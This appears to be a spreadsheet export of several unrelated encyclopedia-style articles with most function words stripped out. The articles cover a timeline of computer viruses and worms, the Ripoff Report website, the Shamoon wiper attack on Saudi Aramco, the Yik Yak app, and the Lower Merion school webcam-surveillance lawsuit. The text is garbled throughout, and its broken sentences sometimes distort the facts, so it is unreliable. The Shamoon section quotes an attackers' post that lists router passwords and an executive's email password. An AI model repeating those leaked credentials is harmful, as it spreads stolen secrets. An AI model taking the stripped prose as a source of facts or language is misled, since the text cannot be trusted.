presented virdem model programs meeting underground chaos computer club germany. virdem model represented first programs could replicate addition code executable files format. 1987 appearance vienna virus, subsequently neutralized first time happened platform. appearance lehigh virus (discovered namesake university), boot sector viruses yale stoned zealand, ping pong italy, appearance first self-encrypting file virus, cascade. lehigh stopped campus spread "wild" computers beyond university), result, never found elsewhere. subsequent infection cascade offices belgium responding antivirus product development. prior this, antivirus solutions developed intended staff only. october: jerusalem virus, part time unknown) suriv family, detected city jerusalem. virus destroys executable files infected machines upon every occurrence friday 13th (except friday november 1987 making first trigger date 1988). jerusalem caused worldwide epidemic 1988. november: virus, boot sector virus amiga computers, appears. immediately creates pandemic virus-writer storm. short time later, releases another, considerably destructive virus, byte bandit. december: christmas tree exec first widely disruptive replicating network program, paralyzed several international computer networks december 1987. written rexx vm/cms operating system originated west germany. re-emerged 1990. 1988 march ping-pong virus (also called boot, bouncing ball, bouncing dot, italian, italian-a veracruz), ms-dos boot sector virus, discovered university turin italy. june: cyberaids festering hate apple prodos viruses spreads underground pirate systems starts infecting mainstream networks. festering hate last iteration cyberaids series extending back 1985 1986. unlike apple viruses come essentially annoying, damage, festering hate series viruses extremely destructive, spreading system files could find host computer (hard drive, floppy, system memory) destroying everything could longer find uninfected files. november morris worm, created robert tappan morris, infects machines running unix connected internet, becomes first worm spread extensively wild", first well-known programs exploiting buffer overrun vulnerabilities. december: father christmas worm attacks machines running connected decnet internet international scientific research network using decnet protocols), affecting nasa research centers. purpose deliver christmas greeting affected users. 1989 october: ghostball, first multipartite virus, discovered friðrik skúlason. infects executable .com files boot sectors ms-dos systems. december: several thousand floppy disks containing aids trojan, first known ransomware, mailed subscribers business world magazine aids conference mailing list. this trojan lies dormant boot cycles, encrypts filenames system, displaying notice asking $189 sent post office panama order receive decryption program. 1990s 1990 mark washburn, working analysis vienna cascade viruses ralf burger, develops first family polymorphic viruses, chameleon family. chameleon series debuted release 1260. june: form computer virus isolated switzerland. would remain wild almost years reappear afterward; 1990s tended common virus wild percent reported infections. 1992 march: michelangelo virus expected create digital apocalypse march millions computers information wiped, according mass media hysteria surrounding virus. later assessments damage showed aftermath minimal. john mcafee quoted media saying five million computers would affected. later said pressed interviewer come number, estimated range five thousand five million, media naturally went higher number. 1993 "leandro" "leandro kelly" "freddy krueger" spread quickly popularity shareware distribution. 1994 april: onehalf dos-based polymorphic computer virus. september: reboot first airs, containing another memorable fictional, sentient computer virus, megabyte. 1995 first macro virus, called "concept", created. attacked microsoft word documents. 1996 "ply" 16-bit based complicated polymorphic virus appeared built-in permutation engine. boza, first virus designed specifically windows files arrives. laroux, first excel macro virus appears. staog, first linux virus attacks linux machines 1998 june first version virus appears. first known virus able erase flash bios content. 1999 january happy99 worm first appeared. invisibly attaches emails, displays fireworks hide changes made, wishes user happy year. modifies system files related outlook express internet explorer (ie) windows windows march melissa worm released, targeting microsoft word outlook-based systems, creating considerable network traffic. june explorezip worm, destroys microsoft office documents, first detected. september: virus isolated december worm javascript computer worm spread exploiting outlook express. 2000s 2000 iloveyou worm (also known love letter, vbs, love worm), computer worm written vbscript using social engineering techniques, infected millions windows computers worldwide within hours release. june pikachu virus believed first computer virus geared children. contains character "pikachu" pokémon series. operating systems affected worm windows windows windows 2001 february anna kournikova virus hits e-mail servers hard sending e-mail contacts microsoft outlook addressbook. creator, wit, sentenced hours community service. march magistr, also called disembowler, discovered. complex email worm windows systems multiple payloads trigger months apart other. targets members profession searching files user's computer various keywords relating court proceedings, activating found. sadmind worm spreads exploiting holes solaris microsoft iis. july: sircam worm released, spreading microsoft systems e-mail unprotected network shares. july code worm attacking index server isapi extension microsoft internet information services released. august complete re-write code worm, code begins aggressively spreading onto microsoft systems, primarily china. september nimda worm discovered spreads variety means including vulnerabilities microsoft windows backdoors left code sadmind worm. october klez worm first identified. exploits vulnerability microsoft internet explorer microsoft outlook outlook express. 2002 february simile virus metamorphic computer virus written assembly. beast windows-based backdoor trojan horse, commonly known (remote administration tool). capable infecting almost versions windows. written delphi released first author tataye 2002, current version released october 2004. march mylife computer worm spread sending malicious emails contacts microsoft outlook. 2003 january slammer worm, sapphire worm, helkern names, attacks vulnerabilities microsoft server msde becomes fastest spreading worm time (measured doubling time peak rate growth), causing massive internet access disruptions worldwide fifteen minutes infecting first victim. april graybird trojan horse also known backdoor.graybird. june prorat turkish-made microsoft windows based backdoor trojan horse, commonly known (remote administration tool). august blaster worm, lovesan worm, rapidly spreads exploiting vulnerability system services present windows computers. august welchia (nachi) worm discovered. worm tries remove blaster worm patch windows. august sobig worm (technically sobig.f worm) spreads rapidly microsoft systems mail network shares. september swen computer worm written c++. october sober worm first seen microsoft systems maintains presence 2005 many variants. simultaneous attacks network weak points blaster sobig worms cause massive damage. november agobot computer worm spread exploiting vulnerabilities microsoft windows. some vulnerabilities ms03-026 ms05-039. november bolgimo computer worm spread exploiting buffer overflow vulnerability microsoft windows dcom interface. 2004 january bagle mass-mailing worm affecting versions microsoft windows. there variants bagle worm, bagle.a bagle.b. bagle.b discovered february 2004. january mydoom worm emerges, currently holds record fastest-spreading mass mailer worm. worm notable performing distributed denial-of-service (ddos) attack www.sco.com, belonged group. february netsky worm discovered. worm spreads email copying folders local hard drive well mapped network drives available. many variants netsky worm appeared. march witty worm record-breaking worm many regards. exploited holes several internet security systems (iss) products. fastest computer issue categorized worm, first internet worm carry destructive payload. spread rapidly using pre-populated list ground-zero hosts. sasser worm emerges exploiting vulnerability microsoft windows lsass service causes problems networks, removing mydoom bagle variants, even interrupting business. june caribe cabir computer worm designed infect mobile phones symbian first computer worm infect mobile phones. spread bluetooth. more information found f-secure symantec. august nuclear (short nuclear remote administration tool) backdoor trojan infects windows family systems (windows 2000, windows windows 2003). august vundo, vundo trojan (also known virtumonde virtumondo sometimes referred juan) trojan known cause popups advertising rogue antispyware programs, sporadically misbehavior including performance degradation denial service websites including google facebook. october bifrost, also known bifrose, backdoor trojan infect windows vista. bifrost uses typical server, server builder, client backdoor program configuration allow remote attack. december: santy, first known "webworm" launched. exploited vulnerability phpbb used google find targets. infected around 40000 sites google filtered search query used worm, preventing spreading. 2005 august 2005: zotob computer worm exploits security vulnerabilities microsoft operating systems like windows 2000, including ms05-039 plug-and-play vulnerability. this worm known spread microsoft-ds port 445. october 2005: copy protection rootkit deliberately surreptitiously included music sold sony exposed. rootkit creates vulnerabilities affected computers, making susceptible infection worms viruses. late 2005: zlob trojan, trojan horse program masquerades required video codec form microsoft windows activex component. first detected late 2005. 2006 january nyxem worm discovered. spread mass-mailing. payload, activates third every month, starting february attempts disable security-related file-sharing software, destroy files certain types, microsoft office files. february discovery first-ever malware low-threat trojan-horse known osx/leap-a osx/oompa-a, announced. late march: brontok variant found late march. brontok mass-email worm origin worm indonesia. june: starbucks virus infects staroffice openoffice. late september: stration warezov worm first discovered. development stuxnet presumed started 2005 2006. 2007 january storm worm identified fast-spreading email spamming threat microsoft systems. begins gathering infected computers storm botnet. around june infected million computers, compromised million computers september. thought originated russia, disguises news email containing film bogus news stories asking download attachment claims film. july: zeus trojan targets microsoft windows steal banking information keystroke logging. 2008 february mocmex trojan, found digital photo frame february 2008. first serious computer virus digital photo frame. virus traced back group china. march torpig, also known sinowal mebroot, trojan horse affects windows, turning anti-virus applications. allows others access computer, modifies data, steals confidential information (such user passwords sensitive data) installs malware victim's computer. rustock.c, hitherto-rumored spambot-type malware advanced rootkit capabilities, announced detected microsoft systems analyzed, wild undetected since october 2007 least. july bohmini.a configurable remote access tool trojan exploits security flaws adobe flash 9.0.115 internet explorer firefox windows sp2. july koobface computer worm targets users facebook myspace. variants constantly appear. november computer worm conficker infects anywhere million microsoft server systems running everything windows 2000 windows beta. french navy, ministry defence (including royal navy warships submarines), sheffield hospital network, german bundeswehr norwegian police affected. microsoft sets bounty us$250,000 information leading capture worm's author(s). five main variants conficker worm known dubbed conficker they discovered november 2008, december 2008, february 2009, march 2009 april 2009, respectively. december 2008, microsoft releases kb958644 patching server service vulnerability responsible spread conficker. 2009 july july 2009 cyber attacks occur emergence w32.dozer attack united states south korea. july symantec discovered daprosy worm, trojan worm intended steal online-game passwords internet cafes. could intercept keystrokes send author, making potentially dangerous worm infect (business-to-business) systems. august source code megapanzer released author gplv3. appears apparently detected wild. november virus kenzero virus spreads online peer-to-peer networks (p2p) taking browsing history. 2010s 2010 january: waledac botnet sent spam emails. february 2010, international group security researchers microsoft took waledac down. january: psyb0t worm discovered. thought unique infect routers high-speed modems. february microsoft announced bsod problem windows machines triggered batch patch tuesday updates caused alureon trojan. june stuxnet, windows trojan, detected. first worm attack scada systems. there suggestions designed target iranian nuclear facilities. uses valid certificate realtek. september virus, called "here have" "vbmania", simple trojan horse arrives inbox odd-but-suggestive subject line "here have". body reads "this document told about, find here" "this free download movies, find here". 2011 spyeye zeus merged code seen. variants attack mobile phone banking information. anti-spyware 2011, trojan horse attacks windows 2000, vista, windows posing anti-spyware program. disables security-related processes anti-virus programs, also blocking access internet, prevents updates. summer 2011: morto worm attempts propagate additional computers microsoft windows remote desktop protocol (rdp). morto spreads forcing infected systems scan windows servers allowing login. once morto finds rdp-accessible system, attempts domain local system account named 'administrator' using several common passwords. detailed overview worm works along password dictionary morto uses done imperva. july zeroaccess rootkit (also known sirefef max++) discovered. september duqu worm thought related stuxnet worm. laboratory cryptography system security (crysys lab) budapest university technology economics hungary discovered threat, analysed malware, wrote 60-page report naming threat duqu. duqu gets name prefix "~dq" gives names files creates. 2012 may: flame also known flamer, skywiper, skywiper modular computer malware attacks computers running microsoft windows. used targeted cyber espionage middle eastern countries. discovery announced 2012 maher center iranian national computer emergency response team (cert), kaspersky crysys budapest university technology economics. crysys stated report "skywiper certainly sophisticated malware encountered practice; arguably, complex malware ever found". august shamoon computer virus designed target computers running microsoft windows energy sector. symantec, kaspersky lab, seculert announced discovery august 2012. september ngrbot worm uses network file transfer, sending receiving commands zombie network machines attacker's server, monitoring controlling network connectivity intercept. employs user-mode rootkit technique hide steal victim's information. this family also designed infect html pages inline frames (iframes), causing redirections, blocking victims getting updates security/antimalware products, killing services. designed connect predefined channel communicate remote botnet. 2013 september: cryptolocker trojan horse discovered. cryptolocker encrypts files user's hard drive, prompts ransom developer receive decryption key. following months, several copycat ransomware trojans also discovered. december: gameover zeus trojan discovered. this type virus steals one's login details popular sites involve monetary transactions. works detecting login page, proceeds inject malicious code page, keystroke logging computer user's details. december: linux.darlloz targets internet things infects routers, security cameras, set-top boxes exploiting vulnerability. 2014 november: regin trojan horse discovered. regin dropper, primarily spread spoofed pages. once installed, quietly downloads additional malware, making difficult signature-based anti-virus programs detect. believed created united states united kingdom tool espionage mass surveillance. 2015 bashlite malware leaked leading massive spike ddos attacks. linux.wifatch revealed general public. found attempt secure devices malicious malware. 2016 january: trojan named "memz" created. creator, leurak, explained trojan intended merely joke. trojan alerts user fact trojan warns proceed, computer longer usable. contains complex payloads corrupt system, displaying artifacts screen runs. once run, application cannot closed without causing damage computer, stop functioning properly regardless. when computer restarted, place bootsplash message reads "your computer trashed memz trojan. enjoy nyan cat…", follows animation nyan cat. february: ransomware locky derivatives spread throughout europe infected several million computers. height spread five thousand computers hour infected germany alone. although ransomware thing time, insufficient cyber security well lack standards responsible high number infections. unfortunately, even date antivirus internet security software unable protect systems early versions locky. february: tiny banker trojan (tinba) makes headlines. since discovery, found infected dozen major banking institutions united states, including bank, chase, hsbc, wells fargo, bank america. tiny banker trojan uses http injection force user's computer believe bank's website. this spoof page look function real one. user enters information point tinba launch bank webpage's "incorrect login information" return, redirect user real website. this trick user thinking entered wrong information proceed normal, although tinba captured credentials sent host. september: mirai creates headlines launching powerful disruptive ddos attacks seen date infecting internet things. mirai ends used ddos attack september 2016 krebs security site reached gbit/s. technica also reported tbit/s attack french host ovh. october 2016 multiple major ddos attacks services service provider occurred using mirai malware installed large number devices, resulting inaccessibility several high-profile websites github, twitter, reddit, netflix, airbnb many others. attribution attack mirai botnet originally reported backconnect inc., security firm. 2017 may: wannacry ransomware attack spreads globally. exploits revealed hacking toolkit leak late 2016 used enable propagation malware. shortly news infections broke online, cybersecurity researcher collaboration others found activated "kill switch" hidden within ransomware, effectively halting initial wave global propagation. next day, researchers announced found variants malware without kill switch. june: petya (malware) attack spreads globally affecting windows systems. researchers symantec reveal ransomware uses eternalblue exploit, similar used wannacry ransomware attack. september: xafecopy trojan attacks countries, affecting android operating systems. kaspersky identified malware ubsod family, stealing money click based billing systems. september: variety remote access trojan (rat), kedi rat, distributed spear phishing campaign. attack targeted citrix users. trojan able evade usual system scanners. kedi trojan characteristics common remote access trojan could communicate command control center gmail using common html, http protocols. 2018 february: thanatos, ransomware, becomes first ransomware program accept ransom payment bitcoin cash. 2019 november: titanium advanced backdoor malware, developed platinum apt. 2020s 2021 july: journalists researchers report discovery spyware, called pegasus, developed distributed private company used infect android smartphones often based 0-day exploits without need user-interaction significant clues user used exfiltrate data, track user locations, capture film camera, activate microphone time. investigation suggests used many targets worldwide revealed e.g. governments' espionage journalists, opposition politicians, activists, business people others. also helpful worm history computer viruses list security hacking incidents timeline computing 2020–present references external links short history hacks, worms, cyberterror mari keefe, computerworld, april 2009 utility list worst computer viruses time</t>
  </si>
  <si>
    <t>Ripoff Report</t>
  </si>
  <si>
    <t>ripoff report privately owned operated for-profit website founded magedson. ripoff report online since december 1998 operated xcentric ventures, based tempe, arizona. reports rebuttals ripoff report allows users complain anonymously firm person. site requires creating account "reports" submitted verify identity users. ripoff report results show google searches people firms) mentioned report, potentially embarrassing damaging them. reports automatically added website: must approved first. according site's terms service, users required affirm reports truthful accurate, site says neither investigates, confirms corroborates accuracy submissions. companies individuals named report respond rebuttal bottom webpage, explains side story, rebuttal approved ripoff report. there charge submit rebuttal, must registered account. alternatively, "repair reputation" something written website, ripoff report asks investigations complaints responses carried "ripoff report's pool arbitrators", edit webpage. according bloomberg businessweek, mechanism example "how make money rebuilding reputations: destroyed first", federal court stated victims "probable cause extortion racketeering".several pages website claim reports anonymity "protected first amendment united states constitution" citing mcintyre ohio elections comm'n, u.s. 334, 341-42, s.ct. 1511, 1516, l.ed.2d 426, (1995) author's decision remain anonymous, like decisions concerning omissions additions content publication, aspect freedom speech protected first amendment.". they also clarify "although first amendment protect defamatory speech, mean contact ripoff report obtain author's name claiming something report false inaccurate. position determine party telling truth, cannot dissolve first amendment rights users based unilateral allegation something report false." operations ripoff report sells space website offers companies option complaint investigations, cost us$5,500 $100,000. also offers arbitration program.the site says that, exception cases decided complainant arbitration, complaints remain public unedited authors allowed remove reports even cases mistake made.in 2013, ripoff report started service called "ripoff report verified" offers companies prior complaints option become "verified". according interview search engine watch, month, "once verified business gets negative complaints, would alerted email negative reviews able discuss resolution person left negative reviews." legal actions ripoff report's legal page claims "you can't ripoff report provide forum speech" "ripoff report long history winning types cases. this federal called communications decency cda, u.s.c. 230." contrary, united states court appeals ninth circuit stated "the communications decency immunize xcentric content creates posts" "does immunize misrepresentations made publisher publishing conduct."by creating account, user agrees exclusive venue arizona legal dispute arising posting. june 2013, federal court maryland found agreement prevent user suing author report ripoff report maryland, user agreement applied rebuttal, report.in blockowicz williams case, f.supp.2d (n.d.ill. 2009), federal district court chicago found ripoff report required comply injunction remove reports named defendant original lawsuit.two australians sued google failure remove links defamatory content ripoff report. february 2011 janice duffy filed defamation proceedings south australia. 2015, duffy prevailed defamation case google serving libelous comments, originating ripoff report, allowing auto-complete function assist users finding content. october 2015, unresolved issues case "...the defences triviality time limitation, application extension time, causation quantum damages."&gt; february 2013, jarrod sierocki filed defamation proceedings queensland. sierocki $287,788.00 damages interest former partner client forced admit defamed sierocki ripoff report's un-redactable forum. related case google appears working australian courts april 2015.in website pages public citizen, noted ripoff report received criticism "corporate advocacy, business remediation customer satisfaction program," particularly whether ripoff report sufficiently discloses facts would influence public's perception program.in july 2013 government india ordered block accessing site. block removed next month.in 2014 australian search engine yahoo!7 blocked ripoff report multiple defamation complaints. unblocked week.ripoff report's publisher, xcentric ventures, llc, unsuccessfully sued consumers attorneys malicious prosecution federal district court phoenix, arizona 2011. august 2015, united states circuit court appeals published order affirming district court's order dismissing case. ruling notes xcentric sued consumers' underlying attempted racketeering extortion claim, "alleged xcentric attempted extort money encouraging third parties post negative reviews, manipulating posts highlight negative reviews highlight negative reviews businesses posted rebuttals, charging high fees 'turn negative positive.' claim tenable district court previously held similar allegations stated extortion claim xcentric," circuit wrote order.in 2015, united states district court district utah stated that, although ripoff report homepage shows lines consumers, consumers" "don't away truth known", site allows competitors, consumers, post comments. ripoff report home page also says: "complaints reviews scams lawsuits frauds reported, file review. consumers educating consumers", allows reasonable inference ripoff report encourages negative content. moreover, ripoff report's webmaster affirmed positive posts company allowed website. therefore, court concluded website's owner neutral publisher, because, large fees companies must website's advocacy programs, interest encourages, negative content. defamation action league now-defunct defamation action league (aka internet defamation league) started january 2007 william stanley force shutdown ripoff report duplicate badbusinessbureau.com (also magedson). defamation action league claimed dedicated fighting online defamation; however, league engaged defamation aims. defamation action league's strategy involved "protesting" companies hosted ripoff report badbusinessbureau.com setting "protest sites" engaging annoyance strategies placing classified companies' telephone numbers products selling sending mass emails customers. return magedson filed lawsuit rico. june 2007 preliminary injunction granted defamationaction.com complaintremover.com. stanley cohorts found liable defamation making death threats. litigation republic italy march 2017, italian data protection authority affirmed ripoff report's activities namely, magedson's requests money edit pages illegal italy. italian authorities also noticed ripoff report's servers occasionally reachable italy order evade controls authorities themselves. besides, noticed pages investigated authorities deleted blue website owner, despite claim ripoff report remove reports. references</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>shamoon (persian: شمعون), also known w32.disttrack, modular computer virus discovered 2012, targeting then-recent 32-bit kernel versions microsoft windows. virus notable destructive nature attack cost recovery. shamoon spread infected machine computers network. once system infected, virus continues compile list files specific locations system, upload attacker, erase them. finally virus overwrites master boot record infected computer, making unusable.the virus used cyberwarfare national companies including saudi arabia's saudi aramco qatar's rasgas. group named "cutting sword justice" claimed responsibility attack 30,000 saudi aramco workstations, causing company spend week restoring services. group later indicated shamoon virus used attack. computer systems rasgas also knocked offline unidentified computer virus, security experts attributing damage shamoon. later described "biggest hack history".symantec, kaspersky lab, seculert announced discovery malware august 2012. kaspersky seculert found similarities shamoon flame malware. shamoon made surprise comeback november 2016, january 2017, december 2018. design shamoon designed erase overwrite hard drive data corrupted image report addresses infected computers back computer inside company's network. malware logic bomb triggered master boot record data wiping payload 11:08 local time wednesday, august attack occurred month ramadan 2012. would appear attack timed occur staff gone holiday reducing chance discovery maximum damage could caused, hampering recovery. virus consisted three components, dropper, wiper reporter. dropper, source infection, creates service name 'ntssrv' enables remain persistent infected computer. dropper built 32-bit 64-bit versions. 32-bit dropper detects 64-bit architecture, drops 64-bit version. this component drops wiper reporter onto infected computer executes itself. spreads across local network copying network shares computers.the wiper component utilizes eldos-produced driver known rawdisk achieve direct user-mode access hard drive without using windows apis. identifies locations files infected computers erases them. sends information files destroyed attacker overwrites erased files corrupted data cannot recovered. component used portions image. 2012 attack used image burning u.s. flag; 2016 attack used photo body alan kurdi. before attack malware unique, used target saudi government causing destruction state-owned national company saudi aramco. example, helps government's saudi arabia find viruses devices people banks. attackers posted pastie pastebin hours prior wiper logic bomb occurring, citing oppression al-saud regime reason behind attack. according chris kubecka, security advisor saudi aramco attack group leader security aramco overseas, attack well-staged. initiated phishing email attack unnamed saudi aramco information technology employee opened, giving group entry company's network around mid-2012. behalf anti-oppression hacker group crimes atrocities taking place various countries around world, especially neighboring countries syria, bahrain, yemen, lebanon, egypt ..., also dual approach world community nations, want main supporters disasters action. main supporters disasters [sic] al-saud corrupt regime sponsors oppressive measures using muslims resources. al-saud partner committing crimes. it's [sic] hands infected blood innocent children people. first step, action performed aramco company, largest financial source al-saud regime. step, penetrated system aramco company using hacked systems several countries sent malicious virus destroy thirty thousand computers networked company. destruction operations began wednesday, 2012 11:08 (local time saudi arabia) completed within hours. kubecka described black talk saudi aramco placed majority security budget control network, leaving business network risk major incident. during attack august 11:08 local time, 30,000 windows based systems began overwritten. symantec found affected systems showed image american flag data deleted overwritten. saudi aramco announced attack facebook page went offline company statement issued august 2012. statement falsely reported normal business resumed august 2012. however middle eastern journalist leaked photographs taken september 2012 showing kilometers petrol trucks unable loaded hacked business systems still inoperable. "saudi aramco restored main internal network services impacted august 2012, malicious virus originated external sources affected 30,000 workstations. workstations since cleaned restored service. precaution, remote internet access online resources restricted. saudi aramco employees returned work august 2012, following holidays, resuming normal business. company confirmed primary enterprise systems hydrocarbon exploration production unaffected operate isolated network systems. production plants also fully operational control systems also isolated." august 2012 attackers behind shamoon posted another pastie pastebin.com, taunting saudi aramco proof still retained access company network. post contained username password security network equipment password aramco khalid al-falih. attackers also referenced portion shamoon malware proof pastie: "mon 29th aug, good day, shn/amoo/lib/pr/~/reversed think funny weird news coming saudi aramco regarding saturday's night. well, expect make clear prove we're done promised, read following facts -valuable ones- company's systems: internet service routers three info follows: core router: sa-ar-co-1# password (telnet): c1sc0p@ss-ar-cr-tl (enable): c1sc0p@ss-ar-cr-bl backup router: sa-ar-co-3# password (telnet): c1sc0p@ss-ar-bk-tl (enable): c1sc0p@ss-ar-bk-bl middle router: sa-ar-co-2# password (telnet): c1sc0p@ss-ar-st-tl (enable): c1sc0p@ss-ar-st-bl- khalid al-falih, ceo, email info follows: khalid.falih@aramco.com password:kal@ram@sa1960- security appliances used: cisco mcafee fireeye default passwords all!!!!!!!!!!we think truly believe mission done need time waste. guess time yell release something public. however, silence solution. hope enjoyed that. wait final paste regarding shn/amoo/lib/pr/~ angry internet lovers #sh" according kubecka, order restore operations, saudi aramco used large private fleet aircraft available funds purchase much world's hard drives, driving price hard drives required quickly possible prices affected speculation. september 2012 gasoline resources dwindling public saudi arabia days august 15th attack. rasgas also affected different variant, crippling similar manner.it unclear attacker interest actually destroying infected kaspersky labs hinted malware could related wiper, used cyber attack iran april. after 2-day analysis, company erroneously concluded malware likely come "scriptkiddies" inspired wiper. later, blog post, eugene kaspersky clarified shamoon categorizing cyberwarfare. also iran–saudi arabia relations notes references</t>
  </si>
  <si>
    <t>Yik Yak</t>
  </si>
  <si>
    <t>pseudonymous social media smartphone application initially launched 2013 relaunched 2021. app, available android, allows people create view discussion threads within 5-mile (8.0 radius (termed "yaks" application). similar anonymous sharing apps nearby, differs others whisper intended sharing primarily proximity user.despite strong levels growth 2013 2014, following several bouts heavy criticism media facilitation cyber-bullying, service stagnation growth user base. 2016 alone, user downloads fell compared 2015. failing maintain user engagement, announced april 2017, service would close coming week. million, block, inc. (formally square, inc.) purchased yak's intellectual property hired several former employees. august 2021, announced official website making comeback, available download recently available android. history co-founders, tyler droll brooks buffington, graduates furman university greenville, south carolina. started collaborating placed class learned code iphone apps. after graduating furman university, decided full-time project. droll dropped medical school started buffington finance career hold. released november 2013, twelve months later, ranked ninth downloaded social media united states. improvements continued throughout 2015, including measures ensure sustainability. last major change announcement january 2016, version available. attempts made 2015 reduce cyber-bullying, mandatory handles (later reverted optional feature) removal herd" feature (also later reverted).on april 2017, bloomberg article, block, inc. (formerly square, inc.) announced intent acquire rights five members team reportedly less million, later revealed closer million final sale.on april 2017, announced would shutting down. declining popularity become noticeable, ceased function 2017.in february 2021, unnamed team purchased rights yikyak brand block, inc.on august 2021, announced would making comeback social media channels. relaunched available download since august 2021. android version released july 2022. 2022, student revealed that, analyzing data, able gain access precise locations users. accuracy within feet and, combination user ids, could potentially used reveal users' identities. funding originally funded atlanta ventures offices based atlanta tech village. april 2014, company announced secured $1.5 million funding various companies vaizra investments, dcm, kevin colleran, azure capital partners. this funding came five months founded, intended enhance app, market united states overseas. june 2014, little months initial $1.5 million, secured million previous investors, together investors renren lianhe holdings draper. during fall 2014, exponential user growth, secured million sequoia capital investors. less year launch, valuation $350 million. 2017, application servers website went offline, application became defunct. 2021, announced website received $6.25 million seed funding unnamed investor. features yak: shorthand term used refer post app. yaks provide main function app, downvoted, commented shared. yaks limited characters removed violates community guardrails. yakarma: yakarma numerical score generated software aims measure active success user. this number increase decrease based upon responses yaks proximate users. yakarma changes depending number downvotes upvotes, replies, comments made user's post. receiving downvotes negatively affects user's yakarma, upvotes increase exact effect yakarma determined status (yakarma) voting user. new: features yaks posted within miles chronological order. hot: features yaks posted within miles, yaks reset daily central. reply icons: user anonymity designed conversations assigning original poster icon, repliers randomly generated emojis, original application limited emojis, relaunch provided 100. while icon randomly assigned, user choose randomize many times like. this icon follows user every conversation participate user possibility credit icon post choose. each reply icon could backed color circles, added randomness anonymity user. nationwide hot: this feature shows highest voted yaks descending order. upvote/downvote: votes essentially user ratings given yak. post become popular receive upvotes downvotes, time displays positive number next votes post reach value permanently deleted. peeks: with 1.2.9 update released february 2022, peeks re-released similar functionality original feature. iteration, college's selected daily basis daily peeks. when college featured likely increase engagement posts thus higher chance featured "nationwide hot". cuss buster: similar word filter, cuss buster filters yaks contain inappropriate language. cuss buster option users enable/disable settings. while provide filter censor words, cannot guarantee inappropriate content caught removed feed. defunct features other yaks: this simply showed google images result page searching word "yak". usually pictures yaks (the animal). photos: this feature allowed users include pictures yaks. company indicated uploaded photos moderated inappropriate content, illegal content, faces allowed local feeds. more specifically, photo collections displayed grid popular photographs submitted anyone specified location. hidden features: also contained word filter. when post contained threatening offensive language, would remind user post could offensive, asked still wished post user bypassed warning, post would flagged subject removal moderators. posts contained phone numbers could posted. campus program campus (short campus representative) program initiative announced twitter december 2021. campus representatives also known campus herders, students college university find post yaks respective herds instagram tiktok account manage. interested students must send application [1], reviewed team member. dissolution original company biggest criticisms social media sites applications inherent potential feed growing amount cyberbullying. widespread bullying harassment committed yak, many schools school districts took action app. these included several chicago school districts, norwich university vermont, eanes independent school district texas, lincoln high school district rhode island, richmond school district ohio, shawnigan lake school canada pueblo county school district colorado. tatum high school mexico banned cell phone school yak, student government association emory university georgia attempted across campus, failed immense backlash students. students colgate university staged three-day protest september 2014 substantially driven racist messages yak.on 2015, santa clara university president michael engh released statement students several racist remarks posted yak. wrote, “hate speech, confused free speech, place santa clara university, violates dignity respect member community entitled treated. hurtful comments directed individuals groups diminish create divisive atmosphere distrust suspicion.”on october 2014, huffington post published editorial ryan chapin mach titled "why your college campus should yak", asserted yak's anonymous messaging boards "are like bathroom stalls without toilets. they're useless, they're sources unhelpful harmful conversations, they're complete eyesore."to remedy cases bullying middle high schools around country, droll buffington amended application include geofences work background. these unseen fences disable application within defined borders. first boundaries installed manually developers, quickly became clear would need outside assistance. they found assistance vermont-based company known maponics. maponics “builds defines geographic boundaries.” they happened already nearly country's high schools mapped, making easy block access areas. fences disabled middle high school grounds throughout country. opened within areas user displayed message along lines looks like you’re trying middle school high school grounds. intended people college-aged above. disabled area.”the frequency bullying harassment happened might exaggerated media stories citing specific incidents. researchers identified mostly used positive explore racial, ethnic, sexual identities build sense community campus. others identified gives marginalized students voice campus.in 2015, gained attention subject preventing suicide attempt college william mary.in december 2014, security researchers discovered demonstrated potential attack service, user could account compromised deanonymised (having identity revealed) attacker using wifi network.in february 2015, exposed systematically downvoting deleting posts mention competitors. automatic system downvoted deleted posts contained words associated names apps used university students, including "fade", "unseen", "erodr", "sneek". downvoting algorithm, assigned downvotes regular intervals posts deleted, appeared designed mislead users thinking posts unpopular amongst peers, rather censored itself.in december 2015, slog seattle times reported western washington university student arrested released bail calling lynching student body president university. racist threats posted yak.during 2016, declined severely, 2015. this limited former projected growth potential, december 2016, laid percent workers. based report verge, community, marketing, design, product teams deeply affected. addition aforementioned manipulation content corporate, presence extensive cyberbullying site primary cause decline usage. however, techcrunch pointed "any forum offering users anonymity means chatting" would potential "plagued cyberbullies".in april 2017, company announced closure. mobile payment operator square purchased remained organization stripped company assets integrated yak's engineers operations. also digg nearby skout whisper references further reading farivar, cyrus december 2016). "yik fires employees, still business model". technica. retrieved december 2016. frith, jordan; saker, michael (2017). "understanding yak: location-based sociability communication place". first monday. (10). doi:10.5210/fm.v22i10.7442. external links official website</t>
  </si>
  <si>
    <t>Robbins v. Lower Merion School District</t>
  </si>
  <si>
    <t>robbins lower merion school district federal class action lawsuit, brought february 2010 behalf students high schools lower merion township, suburb philadelphia. october 2010, school district agreed $610,000 settle robbins parallel hasan lawsuits it.the suit alleged that, dubbed "webcamgate" scandal, schools secretly spied students privacy homes. school authorities surreptitiously remotely activated webcams embedded school-issued laptops students using home. after suit brought, school district, high schools part, revealed secretly taken 66,000 images. suit charged district infringed students' privacy rights. federal judge issued preliminary injunction, ordering school district stop secret webcam monitoring, ordered district plaintiffs' attorney fees.the lawsuit filed 15-year-old high school sophomore (second year student) blake robbins disciplined school behavior home. school based decision discipline robbins photograph secretly taken bedroom, webcam school-issued laptop. without telling students, schools remotely accessed school-issued laptops secretly take pictures students homes, chat logs, records websites visited. school transmitted images servers school, school authorities reviewed shared snapshots others. widely published photo, school photographed robbins bed. federal bureau investigation (fbi), u.s. attorney's office, montgomery county district attorney initiated criminal investigations matter, combined closed find evidence "that would establish beyond reasonable doubt anyone involved criminal intent". addition, u.s. senate judiciary subcommittee held hearings issues raised schools' secret surveillance, senator arlen specter introduced draft legislation senate protect future. parents, media, academics criticized schools, matter cited cautionary example modern technology used infringe personal privacy.in july 2010, another student, jalil hasan, filed parallel second suit. related 1,000+ images school took surreptitiously computer two-month period, including shots bedroom. district deactivated surveillance student february 2010, robbins lawsuit filed. five months later—pursuant court order robbins case—it informed hasan first time secretly taken photographs. district notice third parallel suit third student intended bring district, "improper surveillance lower merion high school student school issued laptop", included taking webcam shots screenshots december 2009 february 2010. complaint lawsuit robbins lower merion school district filed february 2010, u.s. district court eastern district pennsylvania, plaintiffs' lead lawyer, mark haltzman silverang, donohoe, rosenzweig haltzman llc. filed behalf blake robbins, high school students school district, robbins' parents.the complaint alleged high schools issued macbook laptops built-in isight webcams students, school staff remotely activated 